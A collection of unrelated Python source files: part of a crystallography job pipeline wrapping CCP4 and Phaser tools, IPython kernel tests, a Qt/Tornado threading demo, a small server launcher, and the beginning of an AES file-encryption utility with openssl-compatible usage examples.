'ENSEMBLE p PDBFILE "%(pdb)s" IDENTITY %(identity)g' % model,
# if --no-hetatm was used HETATM records are already removed
'ENSEMBLE p HETATOM ON',
'SEARCH ENSEMBLE p NUM %(num)d' % model,
'HKLIN "%s"' % hklin,
'LABIN %s' % labin,
'SGALTERNATIVE SELECT %s' % sg_alt,
'ROOT %s' % root,
# Since Phaser 2.5.6 template matched solutions are moved
# to the template solution origin. Which is better than
# getting a solution one cell away, so we set template here.
'SOLUTION TEMPLATE original_model',
'SOLUTION 6DIM ENSE p EULER 0 0 0 FRAC 0 0 0',
# Final refinement with too high resolution crashes
# with std::bad_alloc, even with 8GB of memory.
'RESOLUTION AUTO HIGH 2.0', # ignored by Phaser if > RESO HIGH
]
if model['mw']:
lines += ['COMPOSITION PROTEIN MW %(mw)f NUMBER %(num)d' % model]
else:
lines += ['COMPOSITION BY AVERAGE']
if opt.slow < 2:
lines += ['KILL TIME 180', # 3h is much more than we want
# 'MACANO PROTOCOL OFF',
'PURGE ROT NUM 7',
'PURGE TRA NUM 20',
'PURGE RNP NUM 10']
if opt.mr_reso > 10: # in this case it's not a reso
lines += ['ELLG TARGET %g' % opt.mr_reso]
else:
lines += ['RESOLUTION HIGH %g' % opt.mr_reso]
# tNCS: we go with what phaser does by default -- tNCS of order 2
# are handled automatically. While we could specify tNCS for
# pseudo-tripling/quadrupling of the cell (TNCS NMOL 3) I don't know
# if it'd do more good or bad.
job = ccp4_job(self, 'phaser', ki=lines, parser='_phaser_parser')
return job
def ensembler(self, pdbin, root):
job = Job(self, 'phaser.ensembler')
job.name = 'ensembler'
job.args += ['root=%s' % root, pdbin]
job.parser = '_ensembler_parser'
return job
# functions below use logical=locals()
# pylint: disable=unused-argument
def pointless(self, hklin, xyzin, hklref=None, hklout=None, keys=''):
return ccp4_job(self, 'pointless', logical=locals(), ki=keys,
parser='_pointless_parser')
def unique(self, hklout, ref, resolution,
labout='F=F_UNIQUE SIGF=SIGF_UNIQUE'):
# Include also reflections that may be present in other spacegroups
# belonging to the same pointgroup and with the same reflections.
# (ignore systematic absences from screw axes by removing screw axes.)
return ccp4_job(self, 'unique', logical=locals(),
ki=['cell %g %g %g %g %g %g' % tuple(ref.cell),
"symmetry '%s'" % ref.unscrewed_symmetry(),
'resolution %.3f' % resolution,
'labout %s' % labout],
parser='')
def freerflag(self, hklin, hklout, keys='', parser=''):
return ccp4_job(self, 'freerflag', logical=locals(), ki=keys,
parser=parser)
#def reindex(self, hklin, hklout, symmetry):
# return ccp4_job(self, 'reindex', logical=locals(),
# ki=["symmetry '%s'" % symmetry,
# 'reindex h,k,l'])
def truncate(self, hklin, hklout, labin, labout):
return ccp4_job(self, 'truncate', logical=locals(),
ki=['labin %s' % labin, 'labout %s' % labout,
'NOHARVEST'],
parser='_truncate_parser')
def ctruncate(self, hklin, hklout, colin, colano):
job = Job(self, 'ctruncate')
job.args += ['-hklin', hklin, '-hklout', hklout, '-colin', colin]
if colano:
job.args += ['-colano', colano]
job.parser = '_ctruncate_parser'
return job
def cad(self, data_in, hklout, keys):
assert isinstance(data_in, list)
hklin_args = []
labin = []
for n, (hklin, labels) in enumerate(data_in):
labels = [a for a in labels if a not in ('H', 'K', 'L')]
hklin_args += ['HKLIN%d' % (n+1), hklin]
labin.append('labin file %d ' % (n+1) +
' '.join('E%d=%s' % (k+1, label)
for k, label in enumerate(labels)))
job = ccp4_job(self, 'cad', logical={}, ki=(labin + keys),
parser='_cad_parser')
job.args += hklin_args + ['HKLOUT', hklout]
return job
def pdbset(self, xyzin, xyzout, cell):
return ccp4_job(self, 'pdbset', logical=locals(),
ki=['cell %g %g %g %g %g %g' % cell])
def refmac5(self, hklin, xyzin, hklout, xyzout, labin, libin, keys):
inp = ['labin %s' % labin] + keys.splitlines()
#inp += ['free 6'] # for testing
job = ccp4_job(self, 'refmac5', logical=locals(), ki=inp,
parser='_refmac_parser')
words = keys.split()
ref_type = '?'
for n, w in enumerate(words[:-2]):
if w == 'refinement' and words[n+1] == 'type':
ref_type = words[n+2][:5]
elif w == 'ridge':
ref_type = 'jelly'
job.name += ' ' + ref_type
job.data['ncyc'] = -1
for n, w in enumerate(words[:-1]):
if w.startswith('ncyc'):
job.data['ncyc'] = int(words[n+1])
return job
def get_final_refinement_job(self):
for job in reversed(self.jobs):
if job.name in ('refmac5 restr', 'refmac5 jelly'):
return job
def findwaters(self, pdbin, hklin, f, phi, pdbout, sigma=2.0):
job = Job(self, 'findwaters')
job.args += ['--pdbin', pdbin, '--hklin', hklin, '--f', f, '--phi', phi,
'--pdbout', pdbout, '--sigma', '%g' % sigma]
return job
def find_blobs(self, hklin, xyzin, sigma=1.0):
# for now search in PATH (which normally includes CBIN)
job = Job(self, utils.syspath('find-blobs'))
job.args += ['-c', '-s%g' % sigma, hklin, xyzin]
job.parser = '_find_blobs_parser'
return job
def mtz2sca(self, mtzin, scaout):
job = Job(self, utils.syspath('mtz2sca'))
job.args += [mtzin, scaout]
return job
def shelxc(self, scain, cell, symmetry):
job = Job(self, utils.syspath('shelxc'))
name = os.path.splitext(scain)[0]
job.args += [name]
job.std_input = '\n'.join([
'SAD %s' % scain,
'CELL %s %s %s %s %s %s' % cell,
'SPAG %s' % symmetry,
])
return job
def anode(self, name):
job = Job(self, utils.syspath('anode'))
job.args += [name]
job.parser = '_anode_parser'
return job
def rwcontents(self, xyzin):
return ccp4_job(self, 'rwcontents', logical=dict(xyzin=xyzin),
parser='_rwcontents_parser')
def coot_py(self, script_text):
job = Job(self, coots.find_path())
job.args += ['--python', '--no-graphics', '--no-guano']
script_text += '\ncoot_real_exit(0)'
# On some Wincoot installations coot-real.exe is started from
# runwincoot.bat directly, and on some as "start ... coot-real ...".
# There is no way afaics to pipe stdin to coot-real.
if os.name == 'nt':
helper_path = self.path('r3d.py')
with open(helper_path, 'w') as f:
f.write(script_text)
job.args.append(helper_path)
else:
job.std_input = script_text
return job
def render_r3d(self, name, img_format):
assert img_format is not None
job = Job(self, utils.syspath('render'))
# render writes normal output to stderr (and nothing to stdout)
job.out.file_extension = 'out'
job.err.file_extension = 'log'
job.args += ['-'+img_format, '%s.%s' % (name, img_format)]
job.stdin_file = name + '.r3d'
job.parser = ' %s.%s' % (name, img_format)
return job
def copy_uncompressed(self, src, dst):
src_fullpath = self.path(src)
dst_fullpath = self.path(dst)
if src.endswith('.gz'):
with gzip.open(src_fullpath, 'rb') as fsrc:
content = fsrc.read()
with open(dst_fullpath, 'wb') as fdst:
fdst.write(content)
else:
try:
shutil.copyfile(src_fullpath, dst_fullpath)
except shutil.Error: # == SameFileError in Python 3.4+
pass
def delete_files(self, filenames):
for f in filenames:
path = self.path(f)
if os.path.exists(path):
try:
os.remove(path)
except OSError as e:
utils.put_error(e)
def open_pickled_workflow(file_or_dir):
if os.path.isdir(file_or_dir):
pkl = os.path.join(file_or_dir, PICKLE_FILENAME)
else:
pkl = file_or_dir
if not os.path.exists(pkl):
utils.put_error('workflow data file not found',
'No such file or directory: %s' % pkl)
sys.exit(1)
f = open(pkl, 'rb')
try:
return pickle.load(f)
except pickle.UnpicklingError:
utils.put_error('"Unpickling" failed',
'Maybe this is not a pickle file: %s' % pkl)
sys.exit(1)
def _write_workflow_steps(wf, output):
for n, job in enumerate(wf.jobs):
output.write('\n%3d %-15s' % (n+1, job.name))
if job.started:
started_at = time.localtime(job.started)
output.write(time.strftime(' %Y-%m-%d %H:%M', started_at))
output.write(' %7.1fs' % job.total_time)
output.write('\n')
def show_workflow_info(wf, mesg_dict):
sys.stdout.write('%s\n' % wf)
sys.stdout.write('Command:\n' + ' '.join(pipes.quote(a) for a in wf.argv))
_write_workflow_steps(wf, sys.stdout)
sys.stderr.write("""
To see details, specify step(s):
%(prog)s info %(output_dir)s STEPS
To re-run selected steps (for debugging):
%(prog)s repeat %(output_dir)s [STEPS]
where STEPS is one or more numbers or a range (examples: 1,2 4-6 8-)
""" % mesg_dict)
def show_job_info(job):
sys.stdout.write('%s\n' % job)
sys.stdout.write(job.args_as_str() + '\n')
if job.total_time:
sys.stdout.write('Total time: %.1fs\n' % job.total_time)
if job.parser and job.parse():
sys.stdout.write('Output summary: %s\n' % job.parse())
if job.out.saved_to:
sys.stdout.write('stdout: %s\n' % job.out.summary())
if job.err.saved_to:
sys.stdout.write('stderr: %s\n' % job.err.summary())
def parse_steps(args, wf):
jobs = []
for arg in args:
try:
for s in arg.split(','):
if '-' in s:
a_, b_ = s.split('-')
a = (int(a_) if a_ != '' else 1)
b = (int(b_) if b_ != '' else len(wf.jobs))
if a == 0 or b == 0:
raise ValueError()
jobs += [wf.jobs[n-1] for n in range(a, b+1)]
else:
jobs.append(wf.jobs[int(s)-1])
except (ValueError, IndexError) as e:
sys.stderr.write('Invalid step number(s): %s\n(%s)\n' % (arg, e))
sys.exit(1)
return jobs
def parse_workflow_commands():
prog = __package__ or os.path.basename(sys.argv[0])
args = sys.argv[1:]
if not args or args[0] not in ('info', 'repeat'):
return False
if len(args) == 1:
sys.stderr.write('Specify output_dir.\n')
return True
# it's handy to use "/my/path/05-cad.log" as "/my/path" "5"
ext = os.path.splitext(args[1])[1]
if os.path.isfile(args[1]) and ext in ('.log', '.err'):
dirname, basename = os.path.split(args[1])
args[1:2] = [dirname, basename.split('-')[0]]
wf = open_pickled_workflow(args[1])
steps = args[2:]
if not steps:
show_workflow_info(wf, dict(prog=prog, output_dir=args[1]))
return True
for job in parse_steps(steps, wf):
if args[0] == 'info':
show_job_info(job)
elif args[0] == 'repeat':
try:
job.data = {} # reset data from parsing
job.run()
utils.comment('\n')
except JobError as e:
utils.put_error(e.msg, comment=e.note)
sys.exit(1)
return True
commands_help = """\
All files are stored in the specified output directory.
For quick summary (after running the program): %(prog)s info OUTPUT_DIR
"""
if __name__ == '__main__':
def test_parser(name, logfile):
parser = globals()['_%s_parser' % name]
job = Job(None, name)
job.out.que = queue.Queue()
with open(logfile) as f:
for line in f:
job.out.que.put(line)
parser(job)
for k in sorted(job.data.keys()):
print('%s %s' % (k, job.data[k]))
assert len(sys.argv) == 3
test_parser(sys.argv[1], logfile=sys.argv[2])
|
test_kernel.py
|
# coding: utf-8
"""test the IPython Kernel"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import io
import os.path
import sys
import nose.tools as nt
from IPython.testing import decorators as dec, tools as tt
from IPython.utils import py3compat
from IPython.utils.path import locate_profile
from IPython.utils.tempdir import TemporaryDirectory
from .utils import (new_kernel, kernel, TIMEOUT, assemble_output, execute,
flush_channels, wait_for_idle)
def _check_mp_mode(kc, expected=False, stream="stdout"):
execute(kc=kc, code="import sys")
flush_channels(kc)
msg_id, content = execute(kc=kc, code="print (sys.%s._check_mp_mode())" % stream)
stdout, stderr = assemble_output(kc.iopub_channel)
nt.assert_equal(eval(stdout.strip()), expected)
# printing tests
def test_simple_print():
"""simple print statement in kernel"""
with kernel() as kc:
iopub = kc.iopub_channel
msg_id, content = execute(kc=kc, code="print ('hi')")
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout, 'hi\n')
nt.assert_equal(stderr, '')
_check_mp_mode(kc, expected=False)
def test_sys_path():
"""test that sys.path doesn't get messed up by default"""
with kernel() as kc:
msg_id, content = execute(kc=kc, code="import sys; print (repr(sys.path[0]))")
stdout, stderr = assemble_output(kc.iopub_channel)
nt.assert_equal(stdout, "''\n")
def test_sys_path_profile_dir():
"""test that sys.path doesn't get messed up when `--profile-dir` is specified"""
with new_kernel(['--profile-dir', locate_profile('default')]) as kc:
msg_id, content = execute(kc=kc, code="import sys; print (repr(sys.path[0]))")
stdout, stderr = assemble_output(kc.iopub_channel)
nt.assert_equal(stdout, "''\n")
@dec.knownfailureif(sys.platform == 'win32', "subprocess prints fail on Windows")
def test_subprocess_print():
"""printing from forked mp.Process"""
with new_kernel() as kc:
iopub = kc.iopub_channel
_check_mp_mode(kc, expected=False)
flush_channels(kc)
np = 5
code = '\n'.join([
"from __future__ import print_function",
"import multiprocessing as mp",
"pool = [mp.Process(target=print, args=('hello', i,)) for i in range(%i)]" % np,
"for p in pool: p.start()",
"for p in pool: p.join()"
])
expected = '\n'.join([
"hello %s" % i for i in range(np)
]) + '\n'
msg_id, content = execute(kc=kc, code=code)
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout.count("hello"), np, stdout)
for n in range(np):
nt.assert_equal(stdout.count(str(n)), 1, stdout)
nt.assert_equal(stderr, '')
_check_mp_mode(kc, expected=False)
_check_mp_mode(kc, expected=False, stream="stderr")
def test_subprocess_noprint():
"""mp.Process without print doesn't trigger iostream mp_mode"""
with kernel() as kc:
iopub = kc.iopub_channel
np = 5
code = '\n'.join([
"import multiprocessing as mp",
"pool = [mp.Process(target=range, args=(i,)) for i in range(%i)]" % np,
"for p in pool: p.start()",
"for p in pool: p.join()"
])
msg_id, content = execute(kc=kc, code=code)
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout, '')
nt.assert_equal(stderr, '')
_check_mp_mode(kc, expected=False)
_check_mp_mode(kc, expected=False, stream="stderr")
@dec.knownfailureif(sys.platform == 'win32', "subprocess prints fail on Windows")
def test_subprocess_error():
"""error in mp.Process doesn't crash"""
with new_kernel() as kc:
iopub = kc.iopub_channel
code = '\n'.join([
"import multiprocessing as mp",
"p = mp.Process(target=int, args=('hi',))",
"p.start()",
"p.join()",
])
msg_id, content = execute(kc=kc, code=code)
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout, '')
nt.assert_true("ValueError" in stderr, stderr)
_check_mp_mode(kc, expected=False)
_check_mp_mode(kc, expected=False, stream="stderr")
# raw_input tests
def test_raw_input():
"""test [raw_]input"""
with kernel() as kc:
iopub = kc.iopub_channel
input_f = "input" if py3compat.PY3 else "raw_input"
theprompt = "prompt> "
code = 'print({input_f}("{theprompt}"))'.format(**locals())
msg_id = kc.execute(code, allow_stdin=True)
msg = kc.get_stdin_msg(block=True, timeout=TIMEOUT)
nt.assert_equal(msg['header']['msg_type'], u'input_request')
content = msg['content']
nt.assert_equal(content['prompt'], theprompt)
text = "some text"
kc.input(text)
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
nt.assert_equal(reply['content']['status'], 'ok')
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout, text + "\n")
@dec.skipif(py3compat.PY3)
def test_eval_input():
"""test input() on Python 2"""
with kernel() as kc:
iopub = kc.iopub_channel
input_f = "input" if py3compat.PY3 else "raw_input"
theprompt = "prompt> "
code = 'print(input("{theprompt}"))'.format(**locals())
msg_id = kc.execute(code, allow_stdin=True)
msg = kc.get_stdin_msg(block=True, timeout=TIMEOUT)
nt.assert_equal(msg['header']['msg_type'], u'input_request')
content = msg['content']
nt.assert_equal(content['prompt'], theprompt)
kc.input("1+1")
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
nt.assert_equal(reply['content']['status'], 'ok')
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout, "2\n")
def test_save_history():
# Saving history from the kernel with %hist -f was failing because of
# unicode problems on Python 2.
with kernel() as kc, TemporaryDirectory() as td:
file = os.path.join(td, 'hist.out')
execute(u'a=1', kc=kc)
wait_for_idle(kc)
execute(u'b=u"abcþ"', kc=kc)
wait_for_idle(kc)
_, reply = execute("%hist -f " + file, kc=kc)
nt.assert_equal(reply['status'], 'ok')
with io.open(file, encoding='utf-8') as f:
content = f.read()
nt.assert_in(u'a=1', content)
nt.assert_in(u'b=u"abcþ"', content)
def test_help_output():
"""ipython kernel --help-all works"""
tt.help_all_output_test('kernel')
def test_is_complete():
with kernel() as kc:
# There are more test cases for this in core - here we just check
# that the kernel exposes the interface correctly.
kc.is_complete('2+2')
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
assert reply['content']['status'] == 'complete'
# SyntaxError should mean it's complete
kc.is_complete('raise = 2')
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
assert reply['content']['status'] == 'invalid'
kc.is_complete('a = [1,\n2,')
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
assert reply['content']['status'] == 'incomplete'
assert reply['content']['indent'] == ''
def test_complete():
with kernel() as kc:
execute(u'a = 1', kc=kc)
wait_for_idle(kc)
cell = 'import IPython\nb = a.'
kc.complete(cell)
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
c = reply['content']
nt.assert_equal(c['status'], 'ok')
nt.assert_equal(c['cursor_start'], cell.find('a.'))
nt.assert_equal(c['cursor_end'], cell.find('a.') + 2)
matches = c['matches']
nt.assert_greater(len(matches), 0)
for match in matches:
nt.assert_equal(match[:2], 'a.')
|
qt_and_tornado.py
|
__author__ = 'breddels'
"""
Demonstrates combining Qt and tornado, both which want to have their own event loop.
The solution is to run tornado in a thread, the issue is that callbacks will then also be executed in this thread, and Qt doesn't like that.
To fix this, I show how to use execute the callback in the main thread, using a Qt signal/event in combination with Promises.
The output of the program is:
fetch page, we are in thread <_MainThread(MainThread, started 47200787479520)>
response is 191548 bytes, we are in thread <Thread(Thread-1, started daemon 47201018689280)>
the other thread should fulfil the result to this promise, we are in thread <Thread(Thread-1, started daemon 47201018689280)>
we received a promise, let us fulfill it, and are in thread <_MainThread(MainThread, started 47200787479520)>
let us set the background to black, we are in thread <_MainThread(MainThread, started 47200787479520)>
The magic happens in this line:
.then(self.move_to_gui_thread)
Without it, you'll see something like this:
fetch page, we are in thread <_MainThread(MainThread, started 47822588292064)>
response is 191604 bytes, we are in thread <Thread(Thread-1, started daemon 47822819497728)>
let us set the background to black, we are in thread <Thread(Thread-1, started daemon 47822819497728)>
QPixmap: It is not safe to use pixmaps outside the GUI thread
"""
from aplus import Promise # https://github.com/xogeny/aplus
import threading
import tornado
from tornado.httpclient import AsyncHTTPClient
from PyQt4 import QtGui
from PyQt4 import QtCore
import sys
# tornado works with futures, this wraps it in a promise
def wrap_future_with_promise(future):
promise = Promise()
def callback(future):
e = future.exception()
if e:
promise.reject(e)
else:
promise.fulfill(future.result())
future.add_done_callback(callback)
return promise
class Window(QtGui.QMainWindow):
signal_promise = QtCore.pyqtSignal(object, object)
def __init__(self):
QtGui.QMainWindow.__init__(self)
self.button = QtGui.QPushButton("Async fetch using tornado", self)
self.button.resize(self.button.sizeHint())
self.button.clicked.connect(self.on_click)
self.signal_promise.connect(self.on_signal_promise)
def on_click(self, *args):
print "fetch page, we are in thread", threading.currentThread()
client = AsyncHTTPClient()
future = client.fetch("http://www.google.com/")
promise = wrap_future_with_promise(future)
# without .then(self.move_to_gui_thread), Qt will complain
promise.then(self.show_output)\
.then(self.move_to_gui_thread)\
.then(self.do_gui_stuff)\
.then(None, self.on_error)
def move_to_gui_thread(self, value):
promise = Promise()
print "the other thread should fulfil the result to this promise, we are in thread", threading.currentThread()
self.signal_promise.emit(promise, value)
return promise
def on_signal_promise(self, promise, value):
print "we received a promise, let us fulfill it, and are in thread", threading.currentThread()
promise.fulfill(value)
def on_error(self, error):
print "error", error
def show_output(self, response):
print "response is", len(response.body), "bytes, we are in thread", threading.currentThread()
def do_gui_stuff(self, response):
print "let us set the background to orange, we are in thread", threading.currentThread()
# this Qt call should only be done from the main thread
self.setStyleSheet("background-color: orange;")
# run the tornado loop in a seperate thread
thread = threading.Thread(target=lambda : tornado.ioloop.IOLoop.current().start())
thread.setDaemon(True)
thread.start()
app = QtGui.QApplication(sys.argv)
window = Window()
window.show()
app.exec_()
|
server.py
|
from waitress import serve
import logging
import asyncio
import threading
from services.streaming.backend import app
# Local
from services.streaming.lib import StreamingAnalytics
from services.streaming.config import collect_env_vars
logger = logging.getLogger('waitress')
logger.setLevel(logging.INFO)
def start_analytics():
asyncio.set_event_loop(asyncio.new_event_loop())
creds = collect_env_vars("API_ID", "API_HASH", "SESSION")
analytics_module = StreamingAnalytics(**creds)
analytics_module.init_client()
def start_server():
asyncio.set_event_loop(asyncio.new_event_loop())
serve(app, host='0.0.0.0', port=8080)
analytics_thread = threading.Thread(target=start_analytics, args=())
analytics_thread.daemon = True
analytics_thread.start()
server_thread = threading.Thread(target=start_server, args=())
server_thread.daemon = True
server_thread.start()
analytics_thread.join()
server_thread.join()
|
lock_files.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Encrypt and decrypt files using AES encryption and a common
password. You can use it lock files before they are uploaded to
storage services like DropBox or Google Drive.
The password can be stored in a safe file, specified on the command
line or it can be manually entered each time the tool is run.
Here is how you would use this tool to encrypt a number of files using
a local, secure file. You can optionally specify the --lock switch but
since it is the default, it is not necessary.
$ lock_files.py file1.txt file2.txt dir1 dir2
Password: secret
Re-enter password: secret
When the lock command is finished all of files will be locked (encrypted,
with a ".locked" extension).
You can lock the same files multiple times with different
passwords. Each time lock_files.py is run in lock mode, another
".locked" extension is appended. Each time it is run in unlock mode, a
".locked" extension is removed. Unlock mode is enabled by specifying
the --unlock option.
Of course, entering the password manually each time can be a challenge.
It is normally easier to create a read-only file that can be re-used.
Here is how you would do that.
$ cat >password-file
thisismysecretpassword
EOF
$ chmod 0600 password-file
You can now use the password file like this to lock and unlock a file.
$ lock_files.py -p password-file file1.txt
$ lock_files.py -p password-file --unlock file1.txt.locked
In decrypt mode, the tool walks through the specified files and
directories looking for files with the .locked extension and unlocks
(decrypts) them.
Here is how you would use this tool to decrypt a file, execute a
program and then re-encrypt it when the program exits.
$ # the unlock operation removes the .locked extension
$ lock_files.py -p ./password --unlock file1.txt.locked
$ edit file1.txt
$ lock_files.py -p ./password file1.txt
The tool checks each file to make sure that it is writeable before
processing. If any files is not writeable, the program reports an
error and exits unless you specify --warn in which case it
reports a warning that the file will be ignored and continues.
If you want to change a file in place you can use --inplace mode.
See the documentation for that option to get more information.
If you want to encrypt and decrypt files so that they can be
processed using openssl, you must use compatibility mode (-c).
Here is how you could encrypt a file using lock_files.py and
decrypt it using openssl.
$ lock_files.py -P secret --lock file1.txt
$ ls file1*
file1.txt.locked
$ openssl enc -aes-256-cbc -d -a -salt -pass pass:secret -in file1.txt.locked -out file1.txt
Here is how you could encrypt a file using openssl and then
decrypt it using lock_files.py.
$ openssl enc -aes-256-cbc -e -a -salt -pass pass:secret -in file1.txt -out file1.txt.locked
$ ls file1*
file1.txt file1.txt.locked
$ lock_files.py -c -W -P secret --unlock file1.txt.locked
$ ls file1*
file1.txt
Note that you have to use the -W option to change errors to
warning because the file1.txt output file already exists.
'''
import argparse
import base64
import getpass
import hashlib
import inspect
import os
import subprocess
import sys
import threading
from threading import Thread, Lock, Semaphore
try:
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
except ImportError as exc:
print('ERROR: Import failed, you may need to run "pip install cryptography".\n{:>7}{}'.format('', exc))
sys.exit(1)
try:
import Queue as queue # python 2
except ImportError:
import queue # python3
# ================================================================
#
# Module scope variables.
#
# ================================================================
VERSION = '1.1.1'
th_mutex = Lock() # mutex for thread IO
th_semaphore = None # semapthore to limit max active threads
th_abort = False # If true, abort all threads
# ================================================================
#
# Classes.
#
# ================================================================
class AESCipher:
'''
Class that provides an object to encrypt or decrypt a string
or a file.
CITATION: http://joelinoff.com/blog/?p=885
'''
def __init__(self, openssl=False, digest='md5', keylen=32, ivlen=16):
'''
Initialize the object.
@param openssl Operate identically to openssl.
@param width Width of the MIME encoded lines for encryption.
@param digest The digest used.
@param keylen The key length (32-256, 16-128, 8-64).
@param ivlen Length of the initialization vector.
'''
self.m_openssl = openssl
self.m_openssl_prefix = b'Salted__' # Hardcoded into openssl.
self.m_openssl_prefix_len = len(self.m_openssl_prefix)
self.m_digest = getattr(__import__('hashlib', fromlist=[digest]), digest)
self.m_keylen = keylen
self.m_ivlen = ivlen
if keylen not in [8, 16, 32]:
err('invalid keylen {}, must be 16, 24 or 32'.format(keylen))
if openssl and ivlen != 16:
err('invalid ivlen size {}, for openssl compatibility it must be 16'.format(ivlen))
def encrypt(self, password, plaintext):
'''
Encrypt the plaintext using the password, optionally using an
openssl compatible encryption algorithm.
If it is run in openssl compatibility mode, it is the same as
running openssl like this:
$ openssl enc -aes-256-cbc -e -a -salt -pass pass:<password> -in plaintext
@param password The password.
@param plaintext The plaintext to encrypt.
@param msgdgst The message digest algorithm.
'''
# Setup key and IV for both modes.
if self.m_openssl:
salt = os.urandom(self.m_ivlen - len(self.m_openssl_prefix))
key, iv = self._get_key_and_iv(password, salt)
if key is None or iv is None:
return None
else:
# No 'Salted__' prefix.
key = self._get_password_key(password)
iv = os.urandom(self.m_ivlen) # IV is the same as block size for CBC mode
# Key
key = self._encode(key)
# Encrypt
padded_plaintext = self._pkcs7_pad(plaintext, self.m_ivlen)
backend = default_backend()
cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=backend)
encryptor = cipher.encryptor()
ciphertext_binary = encryptor.update(padded_plaintext) + encryptor.finalize()
# Finalize
if self.m_openssl:
# Make openssl compatible.
# I first discovered this when I wrote the C++ Cipher class.
# CITATION: http://projects.joelinoff.com/cipher-1.1/doxydocs/html/
openssl_compatible = self.m_openssl_prefix + salt + ciphertext_binary
ciphertext = base64.b64encode(openssl_compatible)
else:
ciphertext = base64.b64encode(iv + ciphertext_binary)
return ciphertext
def decrypt(self, password, ciphertext):
'''
Decrypt the ciphertext using the password, optionally using an
openssl compatible decryption algorithm.
If it was encrypted in openssl compatible mode, it is the same
as running the following openssl decryption command:
$ egrep -v '^#|^$' | openssl enc -aes-256-cbc -d -a -salt -pass pass:<password> -in ciphertext
@param password The password.
@param ciphertext The ciphertext to decrypt.
@returns the decrypted data.
'''
if self.m_openssl:
# Base64 decode
ciphertext_prefixed_binary = base64.b64decode(ciphertext)
if ciphertext_prefixed_binary[:self.m_openssl_prefix_len] != self.m_openssl_prefix:
err('bad header, cannot decrypt')
salt = ciphertext_prefixed_binary[self.m_openssl_prefix_len:self.m_ivlen] # get the salt
# Now create the key and iv.
key, iv = self._get_key_and_iv(password, salt)
if key is None or iv is None:
return None
else:
key = self._get_password_key(password)
ciphertext_prefixed_binary = base64.b64decode(ciphertext)
iv = ciphertext_prefixed_binary[:self.m_ivlen] # IV is the same as block size for CBC mode
# Key
key = self._encode(key)
# Decrypt
ciphertext_binary = ciphertext_prefixed_binary[self.m_ivlen:]
backend = default_backend()
cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=backend)
decryptor = cipher.decryptor()
padded_plaintext = decryptor.update(ciphertext_binary) + decryptor.finalize()
plaintext = self._pkcs7_unpad(padded_plaintext)
return plaintext
def _get_password_key(self, password):
'''
Pad the password if necessary.
This is used by encrypt and decrypt.
Note that the password could be hashed here instead. This
approach is used to maintain backward compatibility.
'''
if len(password) >= self.m_keylen:
key = password[:self.m_keylen]
else:
key = self._pkcs7_pad(password, self.m_keylen)
return key
def _get_key_and_iv(self, password, salt):
'''
Derive the key and the IV from the given password and salt.
This is a niftier implementation than my implementation in C++
because I modified it to support different digests.
@param password The password to use as the seed.
@param salt The salt.
'''
try:
# Ignore is okay here because it will be symmetric for
# both encrypt and decrypt operations.
password = password.encode('utf-8', 'ignore')
maxlen = self.m_keylen + self.m_ivlen
keyiv = self.m_digest(password + salt).digest()
digest = keyiv
while len(keyiv) < maxlen:
digest = self.m_digest(digest + password + salt).digest()
keyiv += digest # append the last 16 bytes
key = keyiv[:self.m_keylen]
iv = keyiv[self.m_keylen:self.m_keylen + self.m_ivlen]
return key, iv
except UnicodeDecodeError as exc:
err('failed to generate key and iv: {}'.format(exc))
return None, None
def _encode(self, val):
'''
Encode a string for Python 2/3 compatibility.
'''
if isinstance(val, str):
try:
val = val.encode('utf-8')
except UnicodeDecodeError:
pass # python 2, don't care
return val
def _pkcs7_pad(self, text, size):
'''
PKCS#7 padding.
Pad to the boundary using a byte value that indicates
the number of padded bytes to make it easy to unpad
later.
@param text The text to pad.
'''
num_bytes = size - (len(text) % size)
# Works for python3 and python2.
if isinstance(text, str):
text += chr(num_bytes) * num_bytes
elif isinstance(text, bytes):
text += bytearray([num_bytes] * num_bytes)
else:
assert False
return text
def _pkcs7_unpad(self, padded):
'''
PKCS#7 unpadding.
We padded with the number of characters to unpad.
Just get it and truncate the string.
Works for python 2/3.
'''
if isinstance(padded, str):
unpadded_len = ord(padded[-1])
elif isinstance(padded, bytes):
unpadded_len = padded[-1]
else:
assert False
return padded[:-unpadded_len]
# ================================================================
#
# Message Utility Functions.
#
# ================================================================
def _msg(prefix, msg, level, ofp):
'''
Thread safe message reporting.
'''
th_mutex.acquire()
try:
ofp.write('{}:{} {}\n'.format(prefix, inspect.stack()[level][2], msg))
finally:
th_mutex.release()
def info(msg, level=1, ofp=sys.stdout):
'''
Display a simple information message with context information.
'''
_msg('INFO', msg, level+1, ofp)
def infov(opts, msg, level=1, ofp=sys.stdout):
'''
Display a simple information message with context information.
'''
if opts.verbose:
_msg('INFO', msg, level+1, ofp)
def infov2(opts, msg, level=1, ofp=sys.stdout):
'''
Display a simple information message with context information.
'''
if opts.verbose > 1:
_msg('INFO', msg, level+1, ofp)
def err(msg, level=1, ofp=sys.stdout):
'''
Display error message with context information and exit.
'''
_msg('ERROR', msg, level+1, ofp)
abort_threads()
sys.exit(1)
def errn(msg, level=1, ofp=sys.stdout):
'''
Display error message with context information but do not exit.
'''
_msg('ERROR', msg, level+1, ofp)
def warn(msg, level=1, ofp=sys.stdout):
'''
Display error message with context information but do not exit.
'''
_msg('WARNING', msg, level+1, ofp)
def _println(msg, ofp=sys.stdout):
'''
Print a message with a new line.
'''
th_mutex.acquire()
try:
ofp.write(msg + '\n')
finally:
th_mutex.release()
# ================================================================
#
# Thread utility functions.
#
# ================================================================
def abort_threads():
'''
Set the abort flag.
'''
th_mutex.acquire()
try:
global th_abort
th_abort = True
finally:
th_mutex.release()
def get_num_cores():
'''
Get the number of available cores.
